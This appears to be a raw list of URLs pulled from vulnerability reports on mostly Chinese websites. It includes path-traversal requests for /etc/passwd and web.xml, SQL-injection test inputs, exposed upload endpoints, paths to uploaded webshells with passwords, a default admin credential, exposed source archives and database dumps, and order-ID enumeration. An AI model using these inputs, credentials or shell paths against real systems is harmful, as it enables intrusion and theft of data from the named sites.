http://epare.airchina.com.cn/epare/servlet/FileUploadManagerServlet?method=download&UUID=3a5f5aa9-adfc-4e3f-9684-1854c7abca26 http://**.**.**.**/online/onabout!showList.action http://m.huatu.com http://**.**.**.**/project_content.php?id=163 http://**.**.**.**/news.php?bid=13 http://**.**.**.**/aboutus.php?id=175 http://buy.vmall.com/check_order.html?skuIds=120894853&uid=260086000053594839&user=%E8%BF%BD%E6%A2%A6%E7%95%85%E7%8E%A9y&activityId=1208&componentIds=&orderSign=810c95d5e406a516cbe9176fb4254cf0&queueSign=undefined&name=%E8%BF%BD%E6%A2%A6%E7%95%85%E7%8E%A9y&ts=1438048802356&valid=1&sign=2b907a1d23ea96235642c808d879ad67&ticket=1ST-265953-1uj5JM3wdrMFHZKr1pur-cas&cid=null&wi=null# http://**.**.**.**/addQuestion.aspx http://**.**.**.**/bugs/wooyun-2010-047165 
http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://www.jintoneguilin.info//user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**//user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**//user/City_ajax.aspx?Cityid=1 http://**.**.**.**//user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**//user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**//user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**//user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**//user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 
http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**//user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**//user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://www.50pk.tv/user/City_ajax.aspx?Cityid=1 http://www.viennaguilin.info/user/City_ajax.aspx?Cityid=1 http://**.**.**.**:84/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**//user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**//user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**//user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**//user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 
http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://www.guishanhotel.info/user/City_ajax.aspx?Cityid=1 http://**.**.**.**//user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**//user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://www.ronghuhotel.info/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**//user/City_ajax.aspx?Cityid=1 http://**.**.**.**//user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/news_view.php?id=485 http://**.**.**.**/works_view.php?id=330 http://**.**.**.**/about.php?id=79&c=2 height:20px;BORDER http://rdetoway.midea.com.cn/web/rdlogin.jsp http://**.**.**.**/ http://**.**.**.**/downloaddetail.asp?FileName=downloaddetail.asp http://mail.swufe.edu.cn/ http://**.**.**.**/ 
http://**.**.**.**/Files/upload/2013-09-02/33b97934-74ee-4ddf-954a-ee5d01e8280f.doc http://club.codoon.com/俱乐部ID/member/detail/俱乐部成员ID/ http://**.**.**.**:81/ http://**.**.**.**/其中链接**.**.**.**/materialgathers!getList.action?flag=15&page=1存在命令执行漏洞 http://cn.arsenal.com/newsdetail.php?id=1405 http://**.**.**.**:83/scjt/lkxxServlet?method=getLkxxView&id=80B4E54C-7904-4859-839E-089D81AEA90B http://**.**.**.**/guidepost/sp.asp http://**.**.**.**:81 http://**.**.**.**:81/page/maint/common/UserResourceUpload.jsp?dir=/ height:20px;BORDER http://service.wode20.com:80/api/newsinfo/newsdetail?******* http://**.**.**.**/news/List.aspx?id=0&words=* http://**.**.**.**/user/index/register?&mobile=XXXXX&password=XXXXX&confirm_password=XXXXX&invite_vcode= http://202.104.30.220/po/find.do http://**.**.**.**/jiaowuchu/jiaogai/default.asp http://**.**.**.**/news_jslist.aspx?classId=36 app.php/login?goto=%2Fshao%2Fweb%2Fapp.php http://**.**.**.**/qzxianxue.rar http://**.**.**.**/点击下图标识中的其中一个链接,均存在命令执行漏洞 http://wooyun.org/bugs/wooyun-2010-0109859 http://210.14.78.115/是天天果园的网站 http://210.14.78.115/ http://210.14.78.115/page/maint/common/UserResourceUpload.jsp?dir=/ height:20px;BORDER http://**.**.**.**/news_all.asp?id=10 http://www.easy-u.com.cn/index.php http://**.**.**.**/admin/login2.aspx http://**.**.**.**/bugs/wooyun-2015-0150732 http://115.182.68.136/hkbaobiao/index.php?/ums/postActivityLog http://**.**.**.**/ http://**.**.**.**/news.asp?id=1354 inurl:hack.asp?pageno= http://**.**.**.**/ http://**.**.**.**/login.html http://**.**.**.**/Golm.asp?id=17139 http://**.**.**.**/login.asp?user=admin'&pass=admin http://user.huxiu.com/ http://user.huxiu.com/.git/ http://shop.zymk.cn/index.php/Tag/?id=2&order=listorder http://182.148.109.57:8090/index.jsp https://github.com/zhangdragon/melon-sg/blob/6bdd1f06cf532727ea6b639de852bfeaf405babb/main/resources/application-props/application.properties file:d:/AjaxUploadFiles file:d:/AjaxUploadFiles 
http://**.**.**.**/AchievementProjectView.aspx?id=30 http://bm.shnu.edu.cn/shtu/login/studentLoginAction.do http://**.**.**.**/freejobs/rctj4site.asp?website=360400 http://**.**.**.**/u.htm?id=600812 http://**.**.**.**/data/ http://**.**.**.**/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.php http://**.**.**.**/admin/admin.php http://**.**.**.**/admin/index.php http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**:81/ http://**.**.**.**/bgoa/oa/ http://120.25.213.204:8001/ http://120.25.213.204:8001/ http://**.**.**.**/LoginPGD.aspx http://**.**.**.**/DBMS/FindHoldList.aspx?h=517&key=&parent=1 http://**.**.**.**/sites/main/internal//editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/aspx/connector.aspx http://**.**.**.**/data/AjaxService.aspx?method=selectzlml&pageSize=10&pageIndex=1&n= http://gps.lnwin.com/ http://gps.lnwin.com/Server/UserServer.asmx http://oa.chinawanda.com:1010/ com:1010 http://**.**.**.**/lookup/yibaoht/user/loadinghos.asp?id= http://**.**.**.**/bugs/wooyun-2013-024919 http://**.**.**.**/news/list.aspx?seachXlid=1285 http://219.238.206.50:8001/ http://219.238.206.50:8001/enterprise/list.asp?type=3 http://www.api.zhuna.cn/e/json_app.php?tm2=2015-11-01&hid=135975&tm1=2015-10-31&orderfrom=157&ver=20&os=android&agentId=157&unionId=0&version=3.4.0&os=android http://**.**.**.** http://**.**.**.**/ http://oa.**.**.**.**/tools/SWFUpload/upload.jsp height:20px;BORDER http://**.**.**.**/null上传的文件名.jsp http://oa.**.**.**.**/nulljspspy.jsp http://bbs.hiapk.com/bbs.hiapk.com.tar.gz http://ucenter.b5m.com/tologin.htm https://**.**.**.**/18601105586/CDRMonitor2.0/blob/f5ab2228c8ebec579527ce3e2d09fc0a384b0621/src/com/cucc/cdrmonitor/storm/bolt/emitter/EmailEmitter.java http://faw3s.com/Member/Login.aspx http://www.tjfaw2013.com/Manager/login.aspx http://**.**.**.**/android_update.json 
http://**.**.**.**/update/installer/yixin.apk","fileName":"yixin.apk","title":"5qOA5rWL5Yiw5paw54mI5pys","description":"MS7jgJDmlrDlop7jgJHnvqTkuLvmlK/mjIHorr7nva7nrqHnkIblkZjjgIHlhaXnvqTpqozor4Hj\ngIHpgoDor7fmlrDmiJDlkZjnmoTmnYPpmZDphY3nva4KMi7jgJDmlrDlop7jgJHpnZLmnpznmoRH\nSUbmiqXorablm77niYfmlK/mjIHmt7vliqDliLDoh6rlrprkuYnooajmg4UKMy7jgJDkvJjljJbj\ngJHpnZLmnpznlKjmiLflj6/ku47igJzlj5HnjrDigJ3kuK3igJzpnZLmnpzmkYTlg4/mnLrigJ3n\nm7TmjqXov5vlhaUKNC7jgJDkvJjljJbjgJHosIPmlbTkvJjljJbkuobpppbluKfmtojmga/liJfo\noajkuK3kv6Hmga/mlLblj5HnmoTnvKnnlaXmlofmoYgKNS7jgJDkvJjljJbjgJHosIPmlbTkvJjl\njJbkuobmmJ/luIHlub/lnLrpppbpobXop4bop4nvvIzkvJjljJbpgJror53ml7bplb/lhZHmjaLm\ntYHnqIsKNi7jgJDkvJjljJbjgJHkvJjljJboh6rlrprkuYnooajmg4Xmt7vliqDlip/og73kuqTk\nupLmtYHnqIvlj4rop4bop4kKNy7jgJDkv67lpI3jgJHkv67lpI3oi6XlubJidWc=","notify":true,"mini":0,"length":46306404,"patch":false,"patchMd5":"","patchDownloadUrl":"","patchLength":0 http://oa.99114.com http://oa.99114.com/page/maint/common/UserResourceUpload.jsp?dir=/ height:20px;BORDER admin:123,登陆后要强制改密码 http://oa.intime.com.cn http://oa.intime.com.cn/page/maint/common/UserResourceUpload.jsp?dir=/ height:20px;BORDER http://hq.fruitday.com:88/ http://hq.fruitday.com:88/page/maint/common/UserResourceUpload.jsp?dir=/ height:20px;BORDER http://chaoshi.12t.cn http://chaoshi.12t.cn/include/upload.php http://**.**.**.**/download/download.jsp?filepath=/web-inf/web.xml&filename=web.xml http://**.**.**.**/news_info.php?typeid=13&id=809 http://www.dcominfo.com/product/index.php?type_id=9 https://github.com/lianggui1983/MesDemo/blob/71afe72065822728c6a275545222db24674e9058/MesSharp/samples/OSharp.Demo.Web/Config/MailSetting.config IsHtml:true EnableSsl:false http://**.**.**.**/costweb/ http://**.**.**.**/costweb/bmPlan/view.do?op=init http://**.**.**.**/costweb/bmperson/view.do?op=printBmInfo&personID=116443 http://**.**.**.**/costweb/bmperson/view.do?op=printBmInfo&personID=116453 
http://**.**.**.**/costweb/bmperson/view.do?op=printBmInfo&personID=104453 http://**.**.**.**/costweb/bmperson/view.do?op=printBmInfo&personID=111453 http://**.**.**.**/costweb/bmperson/view.do?op=printBmInfo&personID=106453 http://www.fawcar.com.cn/module/pageNews_search.jsp?pageFile=pageNews_search&Type=1&sonID=&Main=xxdt&page=1&link_css=link_data&key= http://**.**.**.**/网址,拔出“御剑”一阵乱砍,该http://**.**.**.**/phpmyadmin/index.php立马躺枪。啥都不用登陆,直接访问,不敢相信吧,我自己都不敢相信,吗的,服了。 http://**.**.**.**/reg.aspx?gwid= http://**.**.**.**/querySchool.aspx http://**.**.**.**/zsch_sdhd/member.do?op=login&eventName= http://**.**.**.**/account/getxytg?filetype=G http://**.**.**.**/masjyweb/i/onlineInvite/all http://**.**.**.**/index.php?s=/Index/jobinfo/id/868.html http://**.**.**.**/index.php?s=/Index/jobinfo/id/868*.html http://**.**.**.**/Case.aspx?SoftType=1 http://mail.baofeng.com/extmail/cgi/index.cgi?__mode=show_login http://mail.baofeng.com/extmail/cgi/index.cgi?__mode=show_login IP:114.112.82.33 http://app.wandahotels.com/hotelprocess/found/groupHot.action http://wx.crc-gas.com/admin https://github.com/wubinhong/soa-dubbo/blob/3da8fc3ab7a0d689ed28fa0db3565c78c2a1113e/choumei-frame/demo-center/src/main/resources/system.properties https://github.com/wubinhong/soa-dubbo/blob/3da8fc3ab7a0d689ed28fa0db3565c78c2a1113e/choumei-frame/sample-center/src/main/resources/system.properties http://**.**.**.**/front/articlenews/articlenewsshow.aspx?Uid=201507221452478039rwliqian http://**.**.**.**/front/articlenews/articlenewsshow.aspx?Uid=201507221452478039rwliqian http://**.**.**.**/front/articlenews/articlenewsshow.aspx?Uid=201507221452478039rwliqian http://app.wandahotels.com/hotelprocess/membership/getMembershipList.action http://**.**.**.**/XTGT/admin//FCKeditor/editor/filemanager/connectors/test.html http://yjs.zjut.edu.cn/yjssql_xxjhpt/login.asp http://yjs.zjut.edu.cn/yjssql_xxjhpt/NewStudentStatus/studentStatus-Print.asp?xuehao=1111502119 http://**.**.**.**/login.aspx 
http://oa.bestv.com.cn http://oa.bestv.com.cn/page/maint/common/UserResourceUpload.jsp?dir=/ height:20px;BORDER http://**.**.**.**/ http://**.**.**.**/model/twogradepage/devTrans.aspx?devcode= http://**.**.**.**/model/TwoGradePage/NewsEquipment.aspx?OpenID=%7BOpenID%7D&id= http://**.**.**.**/model/TwoGradePage/CIntroduce.aspx?columnId= http://svn.chinawanda.com:8008/ http://svn.chinawanda.com:8008/Data/db/cwoa1431310103.sql http://svn.chinawanda.com:8008/admin.php?ac=duty&fileurl=duty&menuid=31&pc_hash=20151101003223 http://**.**.**.**/) http://**.**.**.**:8080/zncj/main http://**.**.**.**:8080/zncj/picfile/35a790c20e854adcb8da5809437c3ddb.jpg http://**.**.**.**:82/oia/upload/upload.jsp http://**.**.**.**:82/oia/UploadFile//9999//header/20151012157281.jsp?pas=wooyun http://www.fusionskye.com/news.php?y=2010&m=02 http://211.99.26.182/login.jsp http://**.**.**.**/case/ http://b.b2b.cn/news/InfoList.aspx?categoryid=3&Names=1 http://www.suning.com/webapp/wcs/stores/servlet/MyOrder?storeId=10052&catalogId=10051&otherOrder=1 http://member.suning.com/emall/queryLineOrderDetail?omsOrderId=(修改数字参数,可出现不同订单详情) http://member.suning.com/emall/queryLineOrderDetail?omsOrderId=000279131109 http://member.suning.com/emall/queryLineOrderDetail?omsOrderId=000279131219 http://member.suning.com/emall/queryLineOrderDetail?omsOrderId=000276131219 http://member.suning.com/emall/queryLineOrderDetail?omsOrderId=000276231219 http://member.suning.com/emall/queryLineOrderDetail?omsOrderId=000176231219 http://member.suning.com/emall/queryLineOrderDetail?omsOrderId=000156231219 https://www.baidu.com/s?wd=4008365365%E8%AF%88%E9%AA%97 http://**.**.**.**/main.aspx?page=detail.aspx&id=3984 http://**.**.**.**/detail.aspx?id=3984 http://**.**.**.**/wsyb/Input.aspx?id=9 http://**.**.**.**/about.php?id=13 http://**.**.**.**/caselist.php?id=55 http://**.**.**.**/huodonglist.php?id=46 http://**.**.**.**/news.php?id=16 http://**.**.**.**/newsDetail.php?id=34&tid=13 http://**.**.**.**/product.php?id=1 
http://**.**.**.**/productDetail.php?id=48&pid=1&tid=1 http://**.**.**.**/shhzhx.php?id=5&pid=24 http://www.ubestchoice.co/shhzhxDetail.php?id=120&tid=2 http://www.ubestchoice.co/srshqDetail.php?id=53 http://oa.chinawanda.com:1010/ http://oa.chinawanda.com:1010/eweb/php/file_manager_json.php?dir=file&path=/ https://mail.corp.elong.com http://211.***.***.152 http://tech.corp.elong.com指向某内网IP http://**.**.**.** http://**.**.**.**/pic_detail.php?code=54&table_name=tb_pic http://**.**.**.**/main.php?mod_id=17 http://union.winenice.com/Basic/Login.aspx登录位置的验证码设计缺陷,输入正确抓包后不会失效的,而且用户名密码都是明文传输的: http://2011.sheji.b2b.cn/Product/alllist2012.aspx?CategoryID=455&Page=&ProductName=0&txtKey=1 http://2011.sheji.b2b.cn/Product/alllist2012.aspx?CategoryID=455&Page=&ProductName=0&txtKey=1* http://**.**.**.**/admin/shtitle.php?id=3979 http://oa.t3.com.cn/ http://oa.t3.com.cn/messager/users.data http://**.**.**.**:8888/MyWork/YinZhang/MyYinZhang.aspx http://**.**.**.**:8081/carxygh/webinfo/maintenance_more.jsp?type=105 http://**.**.**.**/etc/infomation_login.html?p=&gateid= http://zcgl.swufe.edu.cn/index.aspx http://rsc.scu.edu.cn/Account/UserLogin.aspx http://www.scuinfo.com/api/comments?postId=7359 http://**.**.**.**/showall.asp?table=twsjy&fID=32 http://api.himoca.com/moca/award/get?uid=1 http://math.ecnu.edu.cn/RCFOA/seminar_template.php?id=290 http://zcjy.ecnu.edu.cn/ http://zcjy.ecnu.edu.cn/NewsDetail.aspx?id=114 zcjy.ecnu.edu.cn/NewsDetail.aspx?id=114 ftp://m.xdowns.com/ http://www.8684.com主站的登录位置没有登录限制: http://**.**.**.**/gxpt/SiteInfo/SiteInfo_Moresel.php?Bar_ID=201 http://**.**.**.**/gxpt/Docu/Docu_sel.php?Sort_ID=16 http://**.**.**.**/gxpt/Docu/Docu_selinfo.php?ID=262 http://**.**.**.**/inter.php?action=gbook&ut=0&s=1 http://**.**.**.**/lesson_more.php?id=86 http://**.**.**.**/sehui_list.php?fl2=%EF%BF%BD%EF%BF%BD%D1%A7%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%CA%B5%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD% 
http://**.**.**.**/loginform.php http://**.**.**.**/new_view.asp?id=870 http://**.**.**.**/docs/hqysl/Commentlist.aspx?ItemID=19 http://**.**.**.**/showproduct.aspx?ProductID=6525&CategoryFilterID=352 http://**.**.**.**/ieDatumAction.public?p=downloadFileByPath&filePath=../../../../../../etc/passwd http://**.**.**.**/ieDatumAction.public?p=downloadFileByPath&filePath=WEB-INF/web.xml http://**.**.**.**/ieDatumAction.public?p=downloadFileByPath&filePath=../../../../../../etc/passwd http://service.iciba.com//comment/get/hot?wid=1602&zid=14&id=0&count=10&start=0&ck=43fb362561eea5dd218659148819c123&uuid=77f******7&sv=android****&v=8.2.5&uid=********×tamp=1446361375&signature=79da46b570d26909a5fd43005f232ab3&key=1000005 https://github.com/andersfan/mishi.apitest/blob/60943ca8c3b97873193b77ebbce3fa80fa5f3b7e/src/main/resources/config/system.properties com:330***** http://test-api.mishi.cn/api http://test-h5.mishi.cn http://test-upload.mishi.cn http://**.**.**.**:8088/myPaper/dk_zxksView.aspx?ksType=0&tID=1'&ecID=1&ModuleID=1 http://**.**.**.**//myPaper/dk_zxksView.aspx?ksType=0&tID=1'&ecID=1&ModuleID=1 http://**.**.**.**:8000/myPaper/dk_zxksView.aspx?ksType=0&tID=1'&ecID=1&ModuleID=1 http://**.**.**.**:8888/ http://**.**.**.**:8888/page/maint/common/UserResourceUpload.jsp?dir=/ height:20px;BORDER http://**.**.**.**/show/infolist.php?c=UUPHPfmjU77Ufmb http://**.**.**.**/show/info.php?id=JkaauTEETkOua3H0 http://**.**.**.**/show/getdateinfo.php?d=2015-11-01 http://**.**.**.**/mail/enContact.php https://sso.zt-express.com/ it.zt-express.com/Views/New/NewView.aspx?id=39937 http://**.**.**.**/public/article/detail/id/1228*/p_id/2 http://**.**.**.**/admin/auth/login http://**.**.**.**/upload/path/test.php http://m.qyer.com/login/login.php?refer=http://m.qyer.com/接口登录位置一开始貌似是没有验证码的,但是后来就出来验证码了 www.57364642@qq.com http://audidtms.faw-vw.com/UserManager/login.do http://audidtms.faw-vw.com/commonUpload.jsp?flag=1&key=2015110152594392 
http://**.**.**.**/Groupon/Coupon/index/token/hnqzhx1397510089?code=02162371569eeb8b5ba829956f880a3i&state=1 https://sso.zt-express.com/ oa.zt-express.com/OA/InfoCenter/ConsignmentInfo/consignmentselect.aspx?method=&SIGN=0&CONSIGNMENTID=d556338ceafb4afb9889b28f0568244b http://www.668xd.com/ http://www.668xd.com/668xd.zip http://www.668xd.com/cssksoft_phpmyadmin/index.php http://oa.mfc.com.cn:81//weaver/weaver.email.FileDownloadLocation?fileid=25*&download=1 http://oa.mfc.com.cn:81//admin.jsp http://**.**.**.**/ http://**.**.**.**/page/maint/common/UserResourceUpload.jsp?dir=/ height:20px;BORDER http://**.**.**.**/wooyun.txt http://**.**.**.**/tempEvent/sxunicom_fans_feedback/ http://**.**.**.**/index.php?m=mobile&a=getCode&f=unicom http://**.**.**.**/bugs/wooyun-2010-061009 http://**.**.**.**/bugs/wooyun-2014-077360 inurl:questionnaire_id http://**.**.**.**/sofpro/gecs/questionnaire/web_list.jsp?questionnaire_id=3 http://oa.superjia.com http://oa.superjia.com/page/maint/common/UserResourceUpload.jsp?dir=/ height:20px;BORDER http://60.191.25.162:5222/users/sign_in https://sso.zt-express.com http://oa.zt-express.com/OA/InfoCenter/NobillInfo/showbig.aspx?method=&billnumber=716665&sign=nobillinfo http://zcgl.swufe.edu.cn/index.aspx http://**.**.**.**/view/default.php?func=listAll&catalog=0703 http://weixin.juneyaoair.com/ws/service/tcityAirportInfoService/getAirTransports http://118.122.88.90:60465/ http://118.122.88.90:60465/page/maint/common/UserResourceUpload.jsp?dir=/ height:20px;BORDER http://tian.web.yinyuetai.com/pictures?albumId=13301&uid=42087860 x.xx/xxxx inurl:do_download.jsp还有类似于download.jsp这样的 http://**.**.**.**/do_download.jsp?path=C:\Windows\System32\drivers\etc\hosts&isLogin=1 http://**.**.**.**/zjk/download/do_download.jsp?filename=../web-inf/web.xml http://**.**.**.**/Common/Js/WebEdit/do_download.jsp?UpLoadPath=WebGlzx/DB/&FileName=../../web-inf/web.xml http://**.**.**.**/setting/tabledown/do_download.jsp?url=/setting/table/../../web-inf/web.xml 
http://**.**.**.**/www/do_download.jsp?filename=../do_download.jsp http://**.**.**.**/synuedm/edm/website/secondpage/thirdpage/do_download.jsp?url=website/appendiximages/../../web-inf/web.xml http://**.**.**.**/download/download.jsp?filepath=download/download.jsp http://**.**.**.**/download/download.jsp?filepath=download/download.jsp http://**.**.**.**/download/download.jsp?filepath=download/../index.jsp www.ruiou.com http://www.chushou.tv/ http://www.chushou.tv/register.htm http://www.chushou.tv/password/reset.htm http://**.**.**.**/about_media_d.php?media_id=11 http://**.**.**.**/about_media_d.php?media_id=11 http://**.**.**.**:80/web/list.asp?id=%5c&name=%BA%EC%CA%AE%D7%D6%CA%C2%D2%B5 http://**.**.**.**:80/web/zyzlist.asp?id=%5c&name=%D0%C2%CE%C5%D6%D0%D0%C4 http://**.**.**.**:80/web/zyzcontent.asp?articleid=2916&id=%5c&name=%D0%C2%CE%C5%D6%D0%D0%C4 http://**.**.**.**:80/web/vote_response.asp http://**.**.**.**/bugs/wooyun-2014-080132 http://**.**.**.**/bugs/wooyun-2010-0125452 http://**.**.**.**/ http://**.**.**.**/CTManager/admin.do?action=selectAdminBySeqid&seqid=1 http://**.**.**.**/CTManager/admin.do?action=selectAdminBySeqid&seqid=5761 http://**.**.**.**/CTManager/admin.do?action=selectAdminBySeqid&seqid=5763 http://**.**.**.**/CTManager/login.do?lel=changeshop&author=WT3338&email=13325559162@**.**.**.** http://**.**.**.**/CTManager/admin.do?action=selectAdmin http://www.daasbank.com/download.action存在命令执行漏洞 http://**.**.**.**/dzqk/ http://**.**.**.**/tjs2010admin/system/Edit.aspx?ID=485 http://**.**.**.**/tjs2010admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http%3A%2F%2F**.**.**.**%2Ftjs2010admin%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Faspx%2Fconnector.aspx http://**.**.**.**/tjs2010admin/member/ptyh.aspx?mid=18219 http://**.**.**.**/web/more_details2.aspx?ID=279 http://**.**.**.**/sysmanage/registryParse.jsp?parentid=0 http://**.**.**.**/sysmanage/registryParse.jsp?parentid=0 
http://**.**.**.**/sysmanage/registryParse.jsp?parentid=0 http://**.**.**.**/jsarticle.php?leng=38&r http://**.**.**.**/ http://bizhi.sogou.com/bbs/ http://**.**.**.**:80/ViewInfo.asp?ID=944 http://**.**.**.**/down/web/editor/admin_login.asp http://**.**.**.**/lqcx.asp http://**.**.**.**/ http://**.**.**.**/customer/grantech/news-detail.asp?id=3565 http://**.**.**.**/customer/grantech/news-detail.asp?id=3565 http://**.**.**.** http://**.**.**.**/platform/public/doFindPassword.jsp http://k.ganji.com/quicklogin http://**.**.**.**/ http://wooyun.org/bugs/wooyun-2010-0140374 http://**.**.**.**/ http://**.**.**.**/Job/List.aspx?ModuleNo=0603 http://**.**.**.**/about/showNews.html?newsid=121 http://**.**.**.**/about/showNews.html?newsid=121 http://blog.topsec.com.cn/wp-login.php http://**.**.**.**/lib/caj.php?Name=5 http://**.**.**.**/lib/caj.php?Name=5 http://221.8.57.106/ http://221.8.57.106/cK/foot.jsp http://**.**.**.**/login/userlogin http://**.**.**.**//qwe.jsp http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.**/ http://**.**.**.**/payment/bankonline/0/toresult http://**.**.**.**/payment/bankonline/0/create http://**.**.**.**/payWebDirect.do http://**.**.**.**/B2B/BTBServiceInterface.asmx http://**.**.**.** http://**.**.**.** http://**.**.**.** https://**.**.**.**/order.do http://**.**.**.**/json/android/payment/bestpaycashiernotify/0/notifyBestpayCashier http://vip.vatti.com.cn/index.php?a=designer&c=index&category=1111&m=designer&page=1 http://www.anshengcredit.com/branch.php?id=30 http://www.anshengcredit.com/admin/login.php https://passport.qcloud.com/index.php http://**.**.**.**/user!login.action存在命令执行漏洞 http://**.**.**.**/22.jsp密码tom http://zh.chaoxing.com/zh.chaoxing.com.rar http://dealer.tuanche.com/ http://**.**.**.**/trade/detail.php?cr=D&cID=5 http://**.**.**.**/trade/detail.php?cr=D&cID=5 www.sfbest.com http://www.sfbest.com http://app.wandahotels.com/hotelprocess/hotel/hotelList.action 
